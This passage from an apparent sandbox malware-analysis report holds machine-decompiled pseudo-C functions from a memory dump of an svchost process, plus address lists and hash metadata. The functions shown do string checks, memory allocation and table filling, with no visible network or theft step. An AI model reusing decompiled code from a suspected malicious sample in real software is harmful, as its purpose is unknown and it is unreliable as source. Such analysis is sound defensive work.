                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                                                                    						return E04006C8C(_v5, _t149, _v28 ^ _t209, _t180, 0x42757e, 0x427564);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				goto L16;
                                                                                                                                                                                                                                                    			}

































                                                                                                                                                                                                                                                    0x0401f9f0
                                                                                                                                                                                                                                                    0x0401f9f0
                                                                                                                                                                                                                                                    0x0401fa00
                                                                                                                                                                                                                                                    0x0401fa05
                                                                                                                                                                                                                                                    0x0401fa0b
                                                                                                                                                                                                                                                    0x0401fa0f
                                                                                                                                                                                                                                                    0x0401fa23
                                                                                                                                                                                                                                                    0x0401fa29
                                                                                                                                                                                                                                                    0x0401fa30
                                                                                                                                                                                                                                                    0x0401fa43
                                                                                                                                                                                                                                                    0x0401fa45
                                                                                                                                                                                                                                                    0x0401fa47
                                                                                                                                                                                                                                                    0x0401fa48
                                                                                                                                                                                                                                                    0x0401fa5e
                                                                                                                                                                                                                                                    0x0401fa64
                                                                                                                                                                                                                                                    0x0401fa74
                                                                                                                                                                                                                                                    0x0401fa80
                                                                                                                                                                                                                                                    0x0401fabc
                                                                                                                                                                                                                                                    0x0401fad1
                                                                                                                                                                                                                                                    0x0401fae3
                                                                                                                                                                                                                                                    0x0401fae9
                                                                                                                                                                                                                                                    0x0401faef
                                                                                                                                                                                                                                                    0x0401faf8
                                                                                                                                                                                                                                                    0x0401fb03
                                                                                                                                                                                                                                                    0x0401fb0f
                                                                                                                                                                                                                                                    0x0401fb14
                                                                                                                                                                                                                                                    0x0401fb1d
                                                                                                                                                                                                                                                    0x0401fb24
                                                                                                                                                                                                                                                    0x0401fb29
                                                                                                                                                                                                                                                    0x0401fb30
                                                                                                                                                                                                                                                    0x0401fb35
                                                                                                                                                                                                                                                    0x0401fb38
                                                                                                                                                                                                                                                    0x0401fb38
                                                                                                                                                                                                                                                    0x0401fb24
                                                                                                                                                                                                                                                    0x0401fb48
                                                                                                                                                                                                                                                    0x0401fba7
                                                                                                                                                                                                                                                    0x0401fbad
                                                                                                                                                                                                                                                    0x0401fbb9
                                                                                                                                                                                                                                                    0x0401fbc7
                                                                                                                                                                                                                                                    0x0401fbd2
                                                                                                                                                                                                                                                    0x0401fbe4
                                                                                                                                                                                                                                                    0x0401fbe9
                                                                                                                                                                                                                                                    0x0401fbf5
                                                                                                                                                                                                                                                    0x0401fbff
                                                                                                                                                                                                                                                    0x0401fc06
                                                                                                                                                                                                                                                    0x0401fc0b
                                                                                                                                                                                                                                                    0x0401fc14
                                                                                                                                                                                                                                                    0x0401fc14
                                                                                                                                                                                                                                                    0x0401fc23
                                                                                                                                                                                                                                                    0x0401fc37
                                                                                                                                                                                                                                                    0x0401fc3a
                                                                                                                                                                                                                                                    0x0401fb4a
                                                                                                                                                                                                                                                    0x0401fb56
                                                                                                                                                                                                                                                    0x0401fb62
                                                                                                                                                                                                                                                    0x0401fb67
                                                                                                                                                                                                                                                    0x0401fb75
                                                                                                                                                                                                                                                    0x0401fb7a
                                                                                                                                                                                                                                                    0x0401fb86
                                                                                                                                                                                                                                                    0x0401fb89
                                                                                                                                                                                                                                                    0x0401fb89
                                                                                                                                                                                                                                                    0x0401fc44
                                                                                                                                                                                                                                                    0x0401fc4f
                                                                                                                                                                                                                                                    0x0401fc5c
                                                                                                                                                                                                                                                    0x0401fc61
                                                                                                                                                                                                                                                    0x0401fc64
                                                                                                                                                                                                                                                    0x0401fc64
                                                                                                                                                                                                                                                    0x0401fc6b
                                                                                                                                                                                                                                                    0x0401fc6d
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401fc73
                                                                                                                                                                                                                                                    0x0401fc73
                                                                                                                                                                                                                                                    0x0401fc85
                                                                                                                                                                                                                                                    0x0401fc85
                                                                                                                                                                                                                                                    0x0401fc6d
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _memset_strlen
                                                                                                                                                                                                                                                    • String ID: duB
                                                                                                                                                                                                                                                    • API String ID: 2279092321-2047154145
                                                                                                                                                                                                                                                    • Opcode ID: 8ef916ac99e2acd8d5d850c8b0a63cac94112d2d259028affcb04b3b3e16ebb3
                                                                                                                                                                                                                                                    • Instruction ID: c505e5f8326b13ea594a17ca5410903a82e5ac8279d4bf993f0f99441c28ac3a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ef916ac99e2acd8d5d850c8b0a63cac94112d2d259028affcb04b3b3e16ebb3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F913BB5D00218AFDB54CFD8D880BAEB7B5BF48318F14C159E909A7341EB35AA85CF51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                                    			E0401C2A0(void* __edi, signed int _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                    				intOrPtr* _v16;
                                                                                                                                                                                                                                                    				signed char _v20;
                                                                                                                                                                                                                                                    				signed char _v21;
                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                    				signed int* _v40;
                                                                                                                                                                                                                                                    				intOrPtr* _v44;
                                                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                    				intOrPtr _t103;
                                                                                                                                                                                                                                                    				intOrPtr _t109;
                                                                                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                                                                                    				void* _t177;
                                                                                                                                                                                                                                                    				void* _t178;
                                                                                                                                                                                                                                                    				void* _t181;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t177 = __edi;
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				while((_a4 & 0x0000ffff) == 1 || (_a4 & 0x0000ffff) == 2 || (_a4 & 0x0000ffff) == 3 || (_a4 & 0x0000ffff) == 4) {
                                                                                                                                                                                                                                                    					if(_a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_v12 =  *0x4250e4(_a8);
                                                                                                                                                                                                                                                    						if(_v12 < 1 || _v12 > 0x64) {
                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_v20 = 1;
                                                                                                                                                                                                                                                    							if((_a4 & 0x0000ffff) == 4) {
                                                                                                                                                                                                                                                    								L16:
                                                                                                                                                                                                                                                    								_v21 = 0;
                                                                                                                                                                                                                                                    								_v44 = E04020CE0(0xa);
                                                                                                                                                                                                                                                    								_v16 = _v44;
                                                                                                                                                                                                                                                    								E04007010(_t177, _v16, 0, 0xa);
                                                                                                                                                                                                                                                    								 *((short*)(_v16 + 8)) = _a4;
                                                                                                                                                                                                                                                    								_t103 = E04020CE0(_v12 + 1);
                                                                                                                                                                                                                                                    								_t181 = _t178 + 0x14;
                                                                                                                                                                                                                                                    								_v48 = _t103;
                                                                                                                                                                                                                                                    								 *_v16 = _v48;
                                                                                                                                                                                                                                                    								E04005A10(_v16,  *_v16, _v12 + 1, _a8);
                                                                                                                                                                                                                                                    								if((_a4 & 0x0000ffff) != 4) {
                                                                                                                                                                                                                                                    									_t109 = E04020CE0(_v20 + 1);
                                                                                                                                                                                                                                                    									_t181 = _t181 + 4;
                                                                                                                                                                                                                                                    									_v52 = _t109;
                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_v16 + 4)) = _v52;
                                                                                                                                                                                                                                                    									E04005A10( *((intOrPtr*)(_v16 + 4)),  *((intOrPtr*)(_v16 + 4)), _v20 + 1, _a12);
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_v16 + 4)) =  *_a12;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_v28 = E0401E4B0();
                                                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                                                    									_t115 = E0401E4A0(_v28);
                                                                                                                                                                                                                                                    									_t178 = _t181 + 4;
                                                                                                                                                                                                                                                    									if(_t115 == 0) {
                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_v40 = 0xfa6d3c;
                                                                                                                                                                                                                                                    									_v36 = 0x2710;
                                                                                                                                                                                                                                                    									_v32 = 0xf9d0e8;
                                                                                                                                                                                                                                                    									if((_a4 & 0x0000ffff) != 2) {
                                                                                                                                                                                                                                                    										if((_a4 & 0x0000ffff) != 3) {
                                                                                                                                                                                                                                                    											if((_a4 & 0x0000ffff) == 4) {
                                                                                                                                                                                                                                                    												_v40 = 0xfa6d44;
                                                                                                                                                                                                                                                    												_v36 = 0xf4240;
                                                                                                                                                                                                                                                    												_v32 = 0x7fbee8;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                    											_v40 = 0xfa6d48;
                                                                                                                                                                                                                                                    											_v36 = 0xf4240;
                                                                                                                                                                                                                                                    											_v32 = 0xbcc7e8;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										_v40 = 0xfa6d40;
                                                                                                                                                                                                                                                    										_v36 = 0xf4240;
                                                                                                                                                                                                                                                    										_v32 = 0x42b5e8;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									if( *_v40 < _v36) {
                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_v32 +  *_v40 * 4)) = _v16;
                                                                                                                                                                                                                                                    										_v8 =  *_v40;
                                                                                                                                                                                                                                                    										 *_v40 =  *_v40 + 1;
                                                                                                                                                                                                                                                    										_v21 = 1;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									E0401E480( &_v28);
                                                                                                                                                                                                                                                    									_t181 = _t178 + 4;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								if((_v21 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    									if( *_v16 != 0) {
                                                                                                                                                                                                                                                    										_v56 =  *_v16;
                                                                                                                                                                                                                                                    										E04020CC0(_v56);
                                                                                                                                                                                                                                                    										_t178 = _t178 + 4;
                                                                                                                                                                                                                                                    										 *_v16 = 0x666;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									if((_a4 & 0x0000ffff) != 4 &&  *((intOrPtr*)(_v16 + 4)) != 0) {
                                                                                                                                                                                                                                                    										_v60 =  *((intOrPtr*)(_v16 + 4));
                                                                                                                                                                                                                                                    										E04020CC0(_v60);
                                                                                                                                                                                                                                                    										_t178 = _t178 + 4;
                                                                                                                                                                                                                                                    										 *((intOrPtr*)(_v16 + 4)) = 0x666;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									if(_v16 != 0) {
                                                                                                                                                                                                                                                    										_v64 = _v16;
                                                                                                                                                                                                                                                    										E04020CC0(_v64);
                                                                                                                                                                                                                                                    										_t178 = _t178 + 4;
                                                                                                                                                                                                                                                    										_v16 = 0x666;
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								if(0 != 0) {
                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v20 =  *0x4250e4(_a12);
                                                                                                                                                                                                                                                    							if(_v20 < 1 || _v20 > 0x64) {
                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								goto L16;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                    			}
























                                                                                                                                                                                                                                                    0x0401c2a0
                                                                                                                                                                                                                                                    0x0401c2a6
                                                                                                                                                                                                                                                    0x0401c2ad
                                                                                                                                                                                                                                                    0x0401c2da
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401c2e7
                                                                                                                                                                                                                                                    0x0401c2f1
                                                                                                                                                                                                                                                    0x0401c2f8
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401c305
                                                                                                                                                                                                                                                    0x0401c305
                                                                                                                                                                                                                                                    0x0401c313
                                                                                                                                                                                                                                                    0x0401c333
                                                                                                                                                                                                                                                    0x0401c333
                                                                                                                                                                                                                                                    0x0401c341
                                                                                                                                                                                                                                                    0x0401c347
                                                                                                                                                                                                                                                    0x0401c352
                                                                                                                                                                                                                                                    0x0401c361
                                                                                                                                                                                                                                                    0x0401c36c
                                                                                                                                                                                                                                                    0x0401c371
                                                                                                                                                                                                                                                    0x0401c374
                                                                                                                                                                                                                                                    0x0401c37d
                                                                                                                                                                                                                                                    0x0401c390
                                                                                                                                                                                                                                                    0x0401c39c
                                                                                                                                                                                                                                                    0x0401c3b2
                                                                                                                                                                                                                                                    0x0401c3b7
                                                                                                                                                                                                                                                    0x0401c3ba
                                                                                                                                                                                                                                                    0x0401c3c3
                                                                                                                                                                                                                                                    0x0401c3d8
                                                                                                                                                                                                                                                    0x0401c39e
                                                                                                                                                                                                                                                    0x0401c3a6
                                                                                                                                                                                                                                                    0x0401c3a6
                                                                                                                                                                                                                                                    0x0401c3e2
                                                                                                                                                                                                                                                    0x0401c3f3
                                                                                                                                                                                                                                                    0x0401c3f7
                                                                                                                                                                                                                                                    0x0401c3fc
                                                                                                                                                                                                                                                    0x0401c401
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401c407
                                                                                                                                                                                                                                                    0x0401c40e
                                                                                                                                                                                                                                                    0x0401c415
                                                                                                                                                                                                                                                    0x0401c423
                                                                                                                                                                                                                                                    0x0401c443
                                                                                                                                                                                                                                                    0x0401c463
                                                                                                                                                                                                                                                    0x0401c465
                                                                                                                                                                                                                                                    0x0401c46c
                                                                                                                                                                                                                                                    0x0401c473
                                                                                                                                                                                                                                                    0x0401c473
                                                                                                                                                                                                                                                    0x0401c445
                                                                                                                                                                                                                                                    0x0401c445
                                                                                                                                                                                                                                                    0x0401c44c
                                                                                                                                                                                                                                                    0x0401c453
                                                                                                                                                                                                                                                    0x0401c453
                                                                                                                                                                                                                                                    0x0401c425
                                                                                                                                                                                                                                                    0x0401c425
                                                                                                                                                                                                                                                    0x0401c42c
                                                                                                                                                                                                                                                    0x0401c433
                                                                                                                                                                                                                                                    0x0401c433
                                                                                                                                                                                                                                                    0x0401c482
                                                                                                                                                                                                                                                    0x0401c494
                                                                                                                                                                                                                                                    0x0401c49c
                                                                                                                                                                                                                                                    0x0401c4aa
                                                                                                                                                                                                                                                    0x0401c4ac
                                                                                                                                                                                                                                                    0x0401c4ac
                                                                                                                                                                                                                                                    0x0401c3eb
                                                                                                                                                                                                                                                    0x0401c3f0
                                                                                                                                                                                                                                                    0x0401c3f0
                                                                                                                                                                                                                                                    0x0401c4bb
                                                                                                                                                                                                                                                    0x0401c4c3
                                                                                                                                                                                                                                                    0x0401c4ca
                                                                                                                                                                                                                                                    0x0401c4d1
                                                                                                                                                                                                                                                    0x0401c4d6
                                                                                                                                                                                                                                                    0x0401c4dc
                                                                                                                                                                                                                                                    0x0401c4dc
                                                                                                                                                                                                                                                    0x0401c4e9
                                                                                                                                                                                                                                                    0x0401c4fa
                                                                                                                                                                                                                                                    0x0401c501
                                                                                                                                                                                                                                                    0x0401c506
                                                                                                                                                                                                                                                    0x0401c50c
                                                                                                                                                                                                                                                    0x0401c50c
                                                                                                                                                                                                                                                    0x0401c517
                                                                                                                                                                                                                                                    0x0401c51c
                                                                                                                                                                                                                                                    0x0401c523
                                                                                                                                                                                                                                                    0x0401c528
                                                                                                                                                                                                                                                    0x0401c52b
                                                                                                                                                                                                                                                    0x0401c52b
                                                                                                                                                                                                                                                    0x0401c517
                                                                                                                                                                                                                                                    0x0401c534
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401c534
                                                                                                                                                                                                                                                    0x0401c31f
                                                                                                                                                                                                                                                    0x0401c326
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401c326
                                                                                                                                                                                                                                                    0x0401c2f8
                                                                                                                                                                                                                                                    0x0401c2da
                                                                                                                                                                                                                                                    0x0401c540

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _memset
                                                                                                                                                                                                                                                    • String ID: d$d
                                                                                                                                                                                                                                                    • API String ID: 2102423945-195624457
                                                                                                                                                                                                                                                    • Opcode ID: 9623b1273be0775a15697b469d724f7f2ac93ca0881c6a5774c0b2da6d5538b3
                                                                                                                                                                                                                                                    • Instruction ID: 6121a1327febe31ce23874249aa6888692dbc835ca9b57b63cb1d65f5ac047f3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9623b1273be0775a15697b469d724f7f2ac93ca0881c6a5774c0b2da6d5538b3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C79138B4E44218EBEB14DF94D484AEEB7B1FF49308F108559E816BB360D375EA81CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _memset_strlen
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 2279092321-2766056989
                                                                                                                                                                                                                                                    • Opcode ID: 465e3f5f656527acc1b894b08e49c7e6ede76f44b8deec7e1eed15ce09421514
                                                                                                                                                                                                                                                    • Instruction ID: 9095bb450417fa4dd51ea0b819b640531f396c38f351a606dd718691427917c8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 465e3f5f656527acc1b894b08e49c7e6ede76f44b8deec7e1eed15ce09421514
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B1142B5E00208FFDB10DFE4DD45BEE77B4AB48314F508254E61477280E635BA458B65
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%